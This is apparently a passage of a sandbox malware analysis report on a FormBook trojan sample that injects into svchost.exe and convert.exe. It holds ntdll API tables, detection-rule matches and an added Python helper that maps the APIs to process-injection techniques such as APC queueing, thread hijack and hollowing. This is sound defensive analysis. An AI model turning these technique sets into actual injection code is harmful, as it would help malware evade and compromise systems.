            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk,2_2_02F735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74340 NtSetContextThread,2_2_02F74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74650 NtSuspendThread,2_2_02F74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AF0 NtWriteFile,2_2_02F72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AD0 NtReadFile,2_2_02F72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AB0 NtWaitForSingleObject,2_2_02F72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BF0 NtAllocateVirtualMemory,2_2_02F72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BE0 NtQueryValueKey,2_2_02F72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BA0 NtEnumerateValueKey,2_2_02F72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B80 NtQueryInformationFile,2_2_02F72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EE0 NtQueueApcThread,2_2_02F72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EA0 NtAdjustPrivilegesToken,2_2_02F72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E80 NtReadVirtualMemory,2_2_02F72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E30 NtWriteVirtualMemory,2_2_02F72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FE0 NtCreateFile,2_2_02F72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FB0 NtResumeThread,2_2_02F72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FA0 NtQuerySection,2_2_02F72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F90 NtProtectVirtualMemory,2_2_02F72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F60 NtCreateProcessEx,2_2_02F72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F30 NtCreateSection,2_2_02F72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CF0 NtOpenProcess,2_2_02F72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CC0 NtQueryVirtualMemory,2_2_02F72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CA0 NtQueryInformationToken,2_2_02F72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C60 NtCreateKey,2_2_02F72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C00 NtQueryInformationProcess,2_2_02F72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DD0 NtDelayExecution,2_2_02F72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DB0 NtEnumerateKey,2_2_02F72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D30 NtUnmapViewOfSection,2_2_02F72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D10 NtMapViewOfSection,2_2_02F72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D00 NtSetInformationFile,2_2_02F72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73090 NtSetValueKey,2_2_02F73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73010 NtOpenDirectoryObject,2_2_02F73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F739B0 NtGetContextThread,2_2_02F739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D70 NtOpenThread,2_2_02F73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D10 NtOpenProcessToken,2_2_02F73D10
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E24340 NtSetContextThread,LdrInitializeThunk,8_2_02E24340
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E24650 NtSuspendThread,LdrInitializeThunk,8_2_02E24650
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22AF0 NtWriteFile,LdrInitializeThunk,8_2_02E22AF0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22AD0 NtReadFile,LdrInitializeThunk,8_2_02E22AD0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22BE0 NtQueryValueKey,LdrInitializeThunk,8_2_02E22BE0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_02E22BF0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_02E22BA0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22B60 NtClose,LdrInitializeThunk,8_2_02E22B60
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22EE0 NtQueueApcThread,LdrInitializeThunk,8_2_02E22EE0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_02E22E80
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22FE0 NtCreateFile,LdrInitializeThunk,8_2_02E22FE0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22FB0 NtResumeThread,LdrInitializeThunk,8_2_02E22FB0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22F30 NtCreateSection,LdrInitializeThunk,8_2_02E22F30
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_02E22CA0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22C60 NtCreateKey,LdrInitializeThunk,8_2_02E22C60
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_02E22C70
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_02E22DF0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22DD0 NtDelayExecution,LdrInitializeThunk,8_2_02E22DD0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_02E22D30
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22D10 NtMapViewOfSection,LdrInitializeThunk,8_2_02E22D10
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E235C0 NtCreateMutant,LdrInitializeThunk,8_2_02E235C0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E239B0 NtGetContextThread,LdrInitializeThunk,8_2_02E239B0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22AB0 NtWaitForSingleObject,8_2_02E22AB0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22B80 NtQueryInformationFile,8_2_02E22B80
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22EA0 NtAdjustPrivilegesToken,8_2_02E22EA0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22E30 NtWriteVirtualMemory,8_2_02E22E30
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22FA0 NtQuerySection,8_2_02E22FA0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22F90 NtProtectVirtualMemory,8_2_02E22F90
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22F60 NtCreateProcessEx,8_2_02E22F60
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22CF0 NtOpenProcess,8_2_02E22CF0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22CC0 NtQueryVirtualMemory,8_2_02E22CC0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22C00 NtQueryInformationProcess,8_2_02E22C00
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22DB0 NtEnumerateKey,8_2_02E22DB0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22D00 NtSetInformationFile,8_2_02E22D00
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E23090 NtSetValueKey,8_2_02E23090
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E23010 NtOpenDirectoryObject,8_2_02E23010
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E23D70 NtOpenThread,8_2_02E23D70
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E23D10 NtOpenProcessToken,8_2_02E23D10
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_002579F0 NtCreateFile,8_2_002579F0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00257B50 NtReadFile,8_2_00257B50
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00257C40 NtDeleteFile,8_2_00257C40
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00257CE0 NtClose,8_2_00257CE0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00257E40 NtAllocateVirtualMemory,8_2_00257E40
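            The `Code function` entries above enumerate the ntdll `Nt*` exports that the injected code in svchost.exe (process index 2) and convert.exe (process index 8) reaches through its own stubs; these are the primitives behind the summary's "direct / indirect syscall", "queues an APC in another process", "modifies the context of a thread in another process" and "maps a DLL or memory area into another process" signatures. Reading them one by one is slow. Grouping them into primitive sets per process shows at a glance which injection technique each process is equipped for. The Python below is an added example, not Joe Sandbox output: it parses the line format exactly as it appears on this page (process path fused to the "Code function:" label, function id repeated at the end), and the three technique sets are my grouping, an assumption rather than a sandbox classification. The input is a constructed subset of the entries above.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of this report's "Code function" entries,
# copied as they appear on the page.
REPORT_LINES = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B60 NtClose,LdrInitializeThunk,2_2_02F72B60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74340 NtSetContextThread,2_2_02F74340
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74650 NtSuspendThread,2_2_02F74650
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BF0 NtAllocateVirtualMemory,2_2_02F72BF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EE0 NtQueueApcThread,2_2_02F72EE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E30 NtWriteVirtualMemory,2_2_02F72E30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FB0 NtResumeThread,2_2_02F72FB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F60 NtCreateProcessEx,2_2_02F72F60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F30 NtCreateSection,2_2_02F72F30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CF0 NtOpenProcess,2_2_02F72CF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D30 NtUnmapViewOfSection,2_2_02F72D30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D10 NtMapViewOfSection,2_2_02F72D10
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F739B0 NtGetContextThread,2_2_02F739B0
Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E24340 NtSetContextThread,LdrInitializeThunk,8_2_02E24340
Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_002579F0 NtCreateFile,8_2_002579F0
Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00257C40 NtDeleteFile,8_2_00257C40
Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0081E8001_2_0081E800
"""

# One report line: "Source: <path>Code function: <pid>_<iter>_<addr> <api,...>,<fid>";
# functions without API references appear as the id written twice.
LINE_RE = re.compile(
    r"^Source: (?P<proc>.+?)Code function: (?P<fid>\d+_\d+_[0-9A-Fa-f]{8}) ?(?P<body>.*)$"
)

# My grouping of ntdll primitives into injection techniques (an assumption,
# not a Joe Sandbox classification). Each set is the minimum a process needs
# to carry the technique out end to end.
TECHNIQUES = {
    "remote APC injection": {
        "NtOpenProcess", "NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtQueueApcThread",
    },
    "thread context hijack": {
        "NtSuspendThread", "NtGetContextThread", "NtSetContextThread", "NtResumeThread",
    },
    "section remapping / hollowing": {
        "NtCreateProcessEx", "NtUnmapViewOfSection", "NtCreateSection", "NtMapViewOfSection",
    },
}


def parse(text):
    """Map 'image#pid_iteration' -> set of Nt* APIs referenced by that process."""
    seen = defaultdict(set)
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        fid, body = m["fid"], m["body"]
        if body.endswith(fid):           # drop the repeated trailing function id
            body = body[: -len(fid)]
        nt_apis = {a for a in body.split(",") if a.startswith("Nt")}
        if nt_apis:                      # bare function ids contribute nothing
            image = m["proc"].rsplit("\\", 1)[-1]
            seen[f"{image}#{fid.rsplit('_', 1)[0]}"] |= nt_apis
    return dict(seen)


def score(seen):
    """Per process and technique, the sorted primitives still missing ([] means the set is complete)."""
    return {
        proc: {name: sorted(prims - apis) for name, prims in TECHNIQUES.items()}
        for proc, apis in seen.items()
    }


def complete(seen):
    """Per process, the techniques for which every primitive is present."""
    return {
        proc: [name for name, missing in techs.items() if not missing]
        for proc, techs in score(seen).items()
    }


if __name__ == "__main__":
    found = parse(REPORT_LINES)
    for proc, techs in complete(found).items():
        print(proc, "->", ", ".join(techs) or "no complete technique set")
```

            A complete primitive set in static code is equipment, not proof of use; the dynamic signatures in the summary (thread injection, APC queueing, writes to foreign memory) are what confirm svchost.exe exercised them. In the constructed sample convert.exe carries only part of the thread-hijack set, so the helper lists what is missing instead of giving a verdict. In the full report both processes expose the same stub table, which is itself a finding: the same FormBook payload is resident in both.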
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008740B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,1_2_008740B1
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00868858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00868858
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_0087545F
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0081E8001_2_0081E800
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083DBB51_2_0083DBB5
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0089804A1_2_0089804A
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0081E0601_2_0081E060
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008241401_2_00824140
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008324051_2_00832405
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008465221_2_00846522
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008906651_2_00890665
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0084267E1_2_0084267E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083283A1_2_0083283A
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008268431_2_00826843
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008489DF1_2_008489DF
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00846A941_2_00846A94
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00890AE21_2_00890AE2
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00828A0E1_2_00828A0E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0086EB071_2_0086EB07
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00878B131_2_00878B13
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083CD611_2_0083CD61
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008470061_2_00847006
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008231901_2_00823190
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0082710E1_2_0082710E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008112871_2_00811287
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008333C71_2_008333C7
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083F4191_2_0083F419
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008256801_2_00825680
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008316C41_2_008316C4
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008258C01_2_008258C0
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008378D31_2_008378D3
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00831BB81_2_00831BB8
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00849D051_2_00849D05
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0081FE401_2_0081FE40
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00831FD01_2_00831FD0
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083BFE61_2_0083BFE6
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_024435D01_2_024435D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010002_2_00401000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028202_2_00402820
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100832_2_00410083
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1032_2_0040E103
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011902_2_00401190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033002_2_00403300
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025C02_2_004025C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE632_2_0040FE63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D6932_2_0042D693
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041672E2_2_0041672E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167332_2_00416733
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC02C02_2_02FC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE02742_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030003E62_2_030003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F02_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA3522_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030001AA2_2_030001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD20002_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF81CC2_2_02FF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF41A22_2_02FF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC81582_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA1182_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F301002_2_02F30100
            Source: C:\Windows\SysWOW64\svchost.exe | Code functions (88):
            2_2_02F5C6E0, 2_2_02F3C7C0, 2_2_02F40770, 2_2_02F64750, 2_2_02FEE4F6, 2_2_03000591, 2_2_02FF2446, 2_2_02FE4420,
            2_2_02F40535, 2_2_02F3EA80, 2_2_02FF6BD7, 2_2_02FFAB40, 2_2_02F6E8F0, 2_2_02F268B8, 2_2_0300A9A6, 2_2_02F4A840,
            2_2_02F42840, 2_2_02F429A0, 2_2_02F56962, 2_2_02FFEEDB, 2_2_02F52E90, 2_2_02FFCE93, 2_2_02F40E59, 2_2_02FFEE26,
            2_2_02F4CFE0, 2_2_02F32FC8, 2_2_02FBEFA0, 2_2_02FB4F40, 2_2_02F60F30, 2_2_02FE2F30, 2_2_02F82F28, 2_2_02F30CF2,
            2_2_02FE0CB5, 2_2_02F40C00, 2_2_02F3ADE0, 2_2_02F58DBF, 2_2_02FDCD1F, 2_2_02F4AD00, 2_2_02FE12ED, 2_2_02F5B2C0,
            2_2_02F452A0, 2_2_02F8739A, 2_2_02F2D34C, 2_2_02FF132D, 2_2_02FF70E9, 2_2_02FFF0E0, 2_2_02FEF0CC, 2_2_02F470C0,
            2_2_0300B16B, 2_2_02F4B1B0, 2_2_02F2F172, 2_2_02F7516C, 2_2_02FF16CC, 2_2_02F85630, 2_2_02FFF7B0, 2_2_02F31460,
            2_2_02FFF43F, 2_2_030095C3, 2_2_02FDD5B0, 2_2_02FF7571, 2_2_02FEDAC6, 2_2_02FDDAAC, 2_2_02F85AA0, 2_2_02FE1AA3,
            2_2_02FB3A6C, 2_2_02FFFA49, 2_2_02FF7A46, 2_2_02FB5BF0, 2_2_02F7DBF9, 2_2_02F5FB80, 2_2_02FFFB76, 2_2_02F438E0,
            2_2_02FAD800, 2_2_02F49950, 2_2_02F5B950, 2_2_02FD5910, 2_2_02F49EB0, 2_2_02F03FD2, 2_2_02F03FD5, 2_2_02FFFFB1,
            2_2_02F41F92, 2_2_02FFFF09, 2_2_02FFFCF2, 2_2_02FB9C32, 2_2_02F5FDC0, 2_2_02FF7D73, 2_2_02FF1D5A, 2_2_02F43D40
            Source: C:\Windows\SysWOW64\convert.exe | Code functions (114):
            8_2_02E702C0, 8_2_02E90274, 8_2_02EB03E6, 8_2_02DFE3F0, 8_2_02EAA352, 8_2_02E82000, 8_2_02EA81CC, 8_2_02EB01AA,
            8_2_02EA41A2, 8_2_02E78158, 8_2_02DE0100, 8_2_02E8A118, 8_2_02E0C6E0, 8_2_02DEC7C0, 8_2_02DF0770, 8_2_02E14750,
            8_2_02E9E4F6, 8_2_02EA2446, 8_2_02E94420, 8_2_02EB0591, 8_2_02DF0535, 8_2_02DEEA80, 8_2_02EA6BD7, 8_2_02EAAB40,
            8_2_02E1E8F0, 8_2_02DD68B8, 8_2_02DF2840, 8_2_02DFA840, 8_2_02EBA9A6, 8_2_02DF29A0, 8_2_02E06962, 8_2_02EAEEDB,
            8_2_02E02E90, 8_2_02EACE93, 8_2_02DF0E59, 8_2_02EAEE26, 8_2_02DE2FC8, 8_2_02DFCFE0, 8_2_02E6EFA0, 8_2_02E64F40,
            8_2_02E32F28, 8_2_02E10F30, 8_2_02E92F30, 8_2_02DE0CF2, 8_2_02E90CB5, 8_2_02DF0C00, 8_2_02DEADE0, 8_2_02E08DBF,
            8_2_02DFAD00, 8_2_02E8CD1F, 8_2_02E912ED, 8_2_02E0B2C0, 8_2_02DF52A0, 8_2_02E3739A, 8_2_02DDD34C, 8_2_02EA132D,
            8_2_02EA70E9, 8_2_02EAF0E0, 8_2_02DF70C0, 8_2_02E9F0CC, 8_2_02DFB1B0, 8_2_02EBB16B, 8_2_02E2516C, 8_2_02DDF172,
            8_2_02EA16CC, 8_2_02E35630, 8_2_02EAF7B0, 8_2_02DE1460, 8_2_02EAF43F, 8_2_02EB95C3, 8_2_02E8D5B0, 8_2_02EA7571,
            8_2_02E9DAC6, 8_2_02E35AA0, 8_2_02E8DAAC, 8_2_02E91AA3, 8_2_02E63A6C, 8_2_02EAFA49, 8_2_02EA7A46, 8_2_02E65BF0,
            8_2_02E2DBF9, 8_2_02E0FB80, 8_2_02EAFB76, 8_2_02DF38E0, 8_2_02E5D800, 8_2_02DF9950, 8_2_02E0B950, 8_2_02E85910,
            8_2_02DF9EB0, 8_2_02DB3FD2, 8_2_02DB3FD5, 8_2_02DF1F92, 8_2_02EAFFB1, 8_2_02EAFF09, 8_2_02EAFCF2, 8_2_02E69C32,
            8_2_02E0FDC0, 8_2_02EA7D73, 8_2_02DF3D40, 8_2_02EA1D5A, 8_2_002416D0, 8_2_0025A120, 8_2_0023C8F0, 8_2_0023CB10,
            8_2_0023AB90, 8_2_002431BB, 8_2_002431C0, 8_2_02AAB208, 8_2_02AAC1A8, 8_2_02AAA4BA, 8_2_02AAA4BF, 8_2_02AAA45B,
            8_2_02AABE06, 8_2_02AABCE8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F87E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F2B970 appears 280 times
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: String function: 00830D27 appears 70 times
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: String function: 00838B40 appears 42 times
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: String function: 00817F41 appears 35 times
            Source: C:\Windows\SysWOW64\convert.exe | Code function: String function: 02E5EA12 appears 86 times
            Source: C:\Windows\SysWOW64\convert.exe | Code function: String function: 02DDB970 appears 280 times
            Source: C:\Windows\SysWOW64\convert.exe | Code function: String function: 02E25130 appears 58 times
            Source: C:\Windows\SysWOW64\convert.exe | Code function: String function: 02E6F290 appears 105 times
            Source: C:\Windows\SysWOW64\convert.exe | Code function: String function: 02E37E54 appears 111 times
            Source: hkLFB22XxS.exe, 00000001.00000003.2109156800.00000000041E3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename ntdll.dllj% vs hkLFB22XxS.exe
            Source: hkLFB22XxS.exe, 00000001.00000003.2115117668.00000000043DD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename ntdll.dllj% vs hkLFB22XxS.exe
            Source: hkLFB22XxS.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
